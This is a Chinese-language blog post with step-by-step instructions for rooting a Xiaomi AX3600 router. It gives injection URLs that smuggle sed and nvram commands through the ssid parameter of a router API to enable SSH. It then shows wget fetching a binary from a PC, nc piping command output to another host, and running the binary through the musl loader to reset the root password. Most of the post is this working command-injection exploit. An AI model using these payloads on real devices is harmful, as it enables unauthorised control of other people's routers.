01
2020
06

[AX3600] 【更新:一行命令搞定】AX3600开启SSH兼修改密码

chpasswd.zip

关于注入这一方面,@LonGDikE 已经说的很清楚了,这里我就不再赘述,我就专门讲讲修改密码的部分。另外这里提供一个简单的一步到位命令:

  1. http://192.168.31.1/cgi-bin/luci/;stok=<STOK>/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h%3Bsed%20-i%20's/channel=.*/channel=%5C%22debug%5C%22/g'%20/etc/init.d/dropbear%3B

复制代码

  1. http://192.168.31.1/cgi-bin/luci/;stok=<STOK>/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h%3Bnvram%20set%20ssh%5Fen%3D1%3B%20nvram%20commit%3B

复制代码

之后执行就行


不好意思,我想多了。我没想到小米这个环境竟然直接提供了passwd命令,感谢@lstions 的提醒,大家直接passwd就行了

  1. echo -e "admin\nadmin" | passwd root;

复制代码

我也是吐了,因为之前不管是自己编译的还是官方的都是没有passwd这个命令的。。。我是真的没想到


需求:一台电脑,安装了python环境(有别的http服务器也行)

  • 下载附件的zip,解压

  • 打开上面解压得到的目录,在当前目录执行

    复制代码


    1. python3 -m http.server --bind 0.0.0.0

  • 然后执行以下代码:(以下所有的执行代码均按照https://www.right.com.cn/forum/thread-4032490-1-1.html帖子所叙方法进行encode,下同)
    复制代码


    1. cd /tmp&&wget <电脑ip>:8000/chpasswd

  • 如果观察到第2步的窗口中出现GET字样说明执行成功
  • 接下来通过chpasswd执行命令就行了


如果不确定是否下载成功,可以执行

  1. ls -l /tmp|nc 电脑ip 1999

复制代码

然后电脑运行:

  1. nc -lvvp 1999

复制代码

就可以接收命令的回显



你以为就这么简单吗?然后你会发现根目录只读,/tmp目录下无法设置执行权限
所以接下来就是重头戏:

  1. echo root:<新密码>|/lib/ld-musl-aarch64.so.1 /tmp/chpasswd

复制代码


这个技术叫做ld执行
运行完之后你就会发现密码已经成功修改了:

 


接下来不用再去用上面麻烦的nc反弹shell了,直接ssh起飞


« 上一篇 下一篇 »

发表评论:

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。